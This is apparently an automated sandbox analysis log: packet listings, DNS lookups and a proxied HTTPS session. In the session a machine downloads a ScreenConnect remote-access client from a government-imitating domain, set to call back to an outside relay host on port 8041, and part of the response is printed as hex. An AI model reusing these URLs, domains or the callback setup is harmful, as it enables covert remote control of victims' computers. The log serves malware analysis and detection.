Nov 13, 2024 18:27:00.530911922 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.530932903 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.531128883 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.531168938 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.531230927 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.550024986 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.550060987 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.550314903 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.550362110 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.598215103 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.648406982 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.648443937 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.648628950 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.648628950 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.648685932 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.648744106 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.656251907 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.656284094 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.656353951 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.656371117 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.656400919 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.656420946 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.658720970 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.658742905 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.658796072 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.658808947 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.658838034 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.658859968 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.765258074 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.765326023 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.765474081 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.765474081 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.765526056 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.765582085 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.779021978 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.779043913 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.779117107 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.779133081 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.779153109 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.779180050 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.779220104 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.779220104 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.779246092 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.779266119 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.779297113 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.779505968 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.779525995 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.779645920 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.779645920 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.779711962 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.779791117 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.780123949 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.780143976 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.780194044 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.780208111 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.780236006 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.780261040 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.781073093 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.781090975 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.781152010 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.781164885 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.781189919 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.781213999 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.784765959 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.784785986 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.784835100 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.784852028 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.784874916 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.784915924 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.900674105 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.900758028 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.900891066 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.900919914 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.900937080 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.900971889 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.900995016 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.901036024 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.901063919 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.901070118 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.901102066 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.901118994 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.901644945 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.901763916 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.901768923 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.901823997 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.901842117 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.901864052 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.903322935 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.903350115 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.903440952 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.903446913 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.903490067 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.903620005 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.903640985 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.903693914 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.903698921 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.903740883 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.903779984 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.903808117 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.903856993 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.903861046 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.903892994 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.903913021 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.904189110 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.904208899 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.904274940 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.904279947 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.904323101 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.904845953 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.904870987 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.904937029 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.904942989 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.904984951 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.905266047 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.905292034 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.905352116 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.905356884 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.905401945 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.905776978 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.905802965 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.905869961 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:00.905874968 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:00.905919075 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:01.023257017 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.023287058 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.023333073 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:01.023364067 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.023375988 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:01.023407936 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:01.026293993 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.026318073 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.026392937 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.026417971 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:01.026423931 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.026463032 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:01.026469946 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.026488066 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.026504040 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:01.026509047 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.026540041 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:01.026588917 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.026611090 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.026643991 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:01.026648045 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.026670933 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:01.026674986 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.026695967 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.026726007 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:01.026730061 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.026751995 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:01.045535088 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.045559883 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.045599937 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:01.045607090 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.045619965 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:01.046076059 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.046094894 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.046132088 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:01.046144962 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.046171904 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:01.046205997 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.046227932 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.046286106 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:01.046300888 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.046524048 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.046540022 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.046586037 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:01.046597004 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.046623945 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:01.046725988 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.046751022 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.046777964 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:01.046787977 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.046813011 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:01.046890020 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.046948910 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:01.046961069 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.047352076 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:01.047418118 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:01.047478914 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:03.802634001 CET	49756	8041	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:03.807801962 CET	8041	49756	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:03.807872057 CET	49756	8041	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:04.325261116 CET	49756	8041	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:04.330445051 CET	8041	49756	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:04.641684055 CET	8041	49756	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:04.660881996 CET	49756	8041	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:04.666091919 CET	8041	49756	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:04.900556087 CET	8041	49756	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:04.941961050 CET	49756	8041	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:34.911653996 CET	49756	8041	192.168.2.4	185.49.126.73
Nov 13, 2024 18:27:34.917038918 CET	8041	49756	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:35.151375055 CET	8041	49756	185.49.126.73	192.168.2.4
Nov 13, 2024 18:27:35.192047119 CET	49756	8041	192.168.2.4	185.49.126.73
Nov 13, 2024 18:28:05.160815001 CET	49756	8041	192.168.2.4	185.49.126.73
Nov 13, 2024 18:28:05.166316032 CET	8041	49756	185.49.126.73	192.168.2.4
Nov 13, 2024 18:28:05.401034117 CET	8041	49756	185.49.126.73	192.168.2.4
Nov 13, 2024 18:28:05.441905975 CET	49756	8041	192.168.2.4	185.49.126.73
Nov 13, 2024 18:28:35.411489010 CET	49756	8041	192.168.2.4	185.49.126.73
Nov 13, 2024 18:28:35.723160982 CET	49756	8041	192.168.2.4	185.49.126.73
Nov 13, 2024 18:28:36.025424957 CET	8041	49756	185.49.126.73	192.168.2.4
Nov 13, 2024 18:28:36.025441885 CET	8041	49756	185.49.126.73	192.168.2.4
Nov 13, 2024 18:28:36.263144970 CET	8041	49756	185.49.126.73	192.168.2.4
Nov 13, 2024 18:28:36.263202906 CET	8041	49756	185.49.126.73	192.168.2.4
Nov 13, 2024 18:28:36.263298988 CET	49756	8041	192.168.2.4	185.49.126.73
Nov 13, 2024 18:28:37.086577892 CET	49756	8041	192.168.2.4	185.49.126.73
Nov 13, 2024 18:28:37.091665983 CET	8041	49756	185.49.126.73	192.168.2.4
Nov 13, 2024 18:28:37.091764927 CET	49756	8041	192.168.2.4	185.49.126.73
Nov 13, 2024 18:28:37.096596956 CET	8041	49756	185.49.126.73	192.168.2.4
Nov 13, 2024 18:28:37.096654892 CET	49756	8041	192.168.2.4	185.49.126.73
Nov 13, 2024 18:28:37.096859932 CET	8041	49756	185.49.126.73	192.168.2.4
Nov 13, 2024 18:28:37.101638079 CET	8041	49756	185.49.126.73	192.168.2.4
Nov 13, 2024 18:28:37.101874113 CET	8041	49756	185.49.126.73	192.168.2.4
Nov 13, 2024 18:29:37.129519939 CET	49756	8041	192.168.2.4	185.49.126.73
Nov 13, 2024 18:29:37.134641886 CET	8041	49756	185.49.126.73	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 13, 2024 18:26:34.794778109 CET	50666	53	192.168.2.4	1.1.1.1
Nov 13, 2024 18:26:34.845277071 CET	53	50666	1.1.1.1	192.168.2.4
Nov 13, 2024 18:27:03.422513008 CET	58590	53	192.168.2.4	1.1.1.1
Nov 13, 2024 18:27:03.771579027 CET	53	58590	1.1.1.1	192.168.2.4
Nov 13, 2024 18:27:06.902520895 CET	53	55982	162.159.36.2	192.168.2.4
Nov 13, 2024 18:27:07.553421021 CET	50225	53	192.168.2.4	1.1.1.1
Nov 13, 2024 18:27:07.561542034 CET	53	50225	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 13, 2024 18:26:34.794778109 CET	192.168.2.4	1.1.1.1	0x9292	Standard query (0)	cloud-ssagov.icu	A (IP address)	IN (0x0001)	false
Nov 13, 2024 18:27:03.422513008 CET	192.168.2.4	1.1.1.1	0x433f	Standard query (0)	api.wisescreen.net	A (IP address)	IN (0x0001)	false
Nov 13, 2024 18:27:07.553421021 CET	192.168.2.4	1.1.1.1	0x107b	Standard query (0)	171.39.242.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 13, 2024 18:26:34.845277071 CET	1.1.1.1	192.168.2.4	0x9292	No error (0)	cloud-ssagov.icu		185.49.126.73	A (IP address)	IN (0x0001)	false
Nov 13, 2024 18:26:39.046849012 CET	1.1.1.1	192.168.2.4	0x5292	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Nov 13, 2024 18:26:39.046849012 CET	1.1.1.1	192.168.2.4	0x5292	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Nov 13, 2024 18:26:39.678493977 CET	1.1.1.1	192.168.2.4	0x964a	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 13, 2024 18:26:39.678493977 CET	1.1.1.1	192.168.2.4	0x964a	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Nov 13, 2024 18:26:42.081053972 CET	1.1.1.1	192.168.2.4	0x4e92	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 13, 2024 18:26:42.081053972 CET	1.1.1.1	192.168.2.4	0x4e92	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Nov 13, 2024 18:27:03.771579027 CET	1.1.1.1	192.168.2.4	0x433f	No error (0)	api.wisescreen.net		185.49.126.73	A (IP address)	IN (0x0001)	false
Nov 13, 2024 18:27:07.561542034 CET	1.1.1.1	192.168.2.4	0x107b	Name error (3)	171.39.242.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

cloud-ssagov.icu

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	185.49.126.73	443	7076	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 17:26:36 UTC	613	OUT	GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session HTTP/1.1 Host: cloud-ssagov.icu Accept-Encoding: gzip Connection: Keep-Alive
2024-11-13 17:26:36 UTC	269	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 117161 Content-Type: application/x-ms-application; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Date: Wed, 13 Nov 2024 17:26:36 GMT Connection: close
2024-11-13 17:26:36 UTC	16115	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 32 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=
2024-11-13 17:26:36 UTC	16384	IN	Data Raw: 62 67 67 38 54 52 50 49 50 55 6c 52 38 45 41 47 6c 69 52 47 38 79 66 59 52 6f 64 77 71 45 6c 46 44 4c 68 4b 54 47 45 6b 53 6b 48 75 45 45 6c 4f 31 6d 42 49 59 67 77 51 54 4d 39 72 37 45 35 69 6e 4a 52 53 58 55 49 59 55 79 31 33 46 46 43 58 6b 4e 52 56 67 42 49 49 56 64 59 61 51 46 57 34 36 48 68 59 43 77 4a 63 57 48 61 72 43 46 67 30 41 33 42 5a 69 6a 54 45 5a 37 35 39 53 47 39 4a 2f 42 78 37 6a 76 49 67 65 76 55 2b 52 48 6d 39 47 32 52 37 6f 79 66 6f 65 77 58 79 75 48 77 39 4f 45 53 42 36 7a 43 6f 67 4a 72 39 62 49 45 39 4b 4f 79 46 4a 6c 31 59 68 45 58 59 63 49 74 50 52 58 43 4c 58 66 4a 4d 69 37 52 32 79 49 75 4c 43 75 53 4b 59 33 42 51 6a 4e 43 7a 2b 49 2f 2b 4a 57 79 52 67 6f 57 67 6b 77 6a 5a 75 4a 47 48 4c 62 69 51 6a 30 32 38 6b 68 48 35 7a 4a 4c Data Ascii: bgg8TRPIPUlR8EAGliRG8yfYRodwqElFDLhKTGEkSkHuEElO1mBIYgwQTM9r7E5inJRSXUIYUy13FFCXkNRVgBIIVdYaQFW46HhYCwJcWHarCFg0A3BZijTEZ759SG9J/Bx7jvIgevU+RHm9G2R7oyfoewXyuHw9OESB6zCogJr9bIE9KOyFJl1YhEXYcItPRXCLXfJMi7R2yIuLCuSKY3BQjNCz+I/+JWyRgoWgkwjZuJGHLbiQj028khH5zJL
2024-11-13 17:26:36 UTC	16384	IN	Data Raw: 41 62 77 42 73 41 46 41 41 59 51 42 75 41 47 55 41 62 41 42 4e 41 47 45 41 62 67 42 68 41 47 63 41 5a 51 42 44 41 48 49 41 5a 51 42 6b 41 47 55 41 62 67 42 30 41 47 6b 41 59 51 42 73 41 48 4d 41 52 41 42 6c 41 48 4d 41 59 77 42 79 41 47 6b 41 63 41 42 30 41 47 6b 41 62 77 42 75 41 43 49 4e 41 41 42 45 51 77 42 76 41 47 34 41 64 41 42 79 41 47 38 41 62 41 42 51 41 47 45 41 62 67 42 6c 41 47 77 41 54 51 42 68 41 47 34 41 59 51 42 6e 41 47 55 41 51 77 42 79 41 47 55 41 5a 41 42 6c 41 47 34 41 64 41 42 70 41 47 45 41 62 41 42 7a 41 46 51 41 61 51 42 30 41 47 77 41 5a 51 42 5a 44 51 41 41 54 45 4d 41 62 77 42 75 41 48 51 41 63 67 42 76 41 47 77 41 55 41 42 68 41 47 34 41 5a 51 42 73 41 45 30 41 59 51 42 75 41 47 45 41 5a 77 42 6c 41 46 41 41 5a 51 42 79 41 48 Data Ascii: AbwBsAFAAYQBuAGUAbABNAGEAbgBhAGcAZQBDAHIAZQBkAGUAbgB0AGkAYQBsAHMARABlAHMAYwByAGkAcAB0AGkAbwBuACINAABEQwBvAG4AdAByAG8AbABQAGEAbgBlAGwATQBhAG4AYQBnAGUAQwByAGUAZABlAG4AdABpAGEAbABzAFQAaQB0AGwAZQBZDQAATEMAbwBuAHQAcgBvAGwAUABhAG4AZQBsAE0AYQBuAGEAZwBlAFAAZQByAH
2024-11-13 17:26:36 UTC	16384	IN	Data Raw: 41 61 51 42 73 41 47 6b 41 64 41 42 35 41 46 41 41 5a 51 42 79 41 47 30 41 61 51 42 7a 41 48 4d 41 61 51 42 76 41 47 34 41 63 77 42 45 41 47 6b 41 59 51 42 73 41 47 38 41 5a 77 42 55 41 47 55 41 65 41 42 30 41 45 4d 41 62 77 42 75 41 48 51 41 5a 51 42 75 41 48 51 41 52 67 42 76 41 48 49 41 62 51 42 68 41 48 51 41 65 79 30 41 41 45 35 4e 41 47 45 41 59 77 42 4a 41 47 34 41 63 77 42 30 41 48 49 41 64 51 42 6a 41 48 51 41 61 51 42 76 41 47 34 41 59 51 42 73 41 45 51 41 61 51 42 68 41 47 77 41 62 77 42 6e 41 45 51 41 61 51 42 7a 41 47 30 41 61 51 42 7a 41 48 4d 41 51 67 42 31 41 48 51 41 64 41 42 76 41 47 34 41 56 41 42 6c 41 48 67 41 64 41 43 4b 4d 51 41 41 51 6b 30 41 59 51 42 6a 41 46 49 41 5a 51 42 70 41 47 34 41 63 77 42 30 41 47 45 41 62 41 42 73 41 46 Data Ascii: 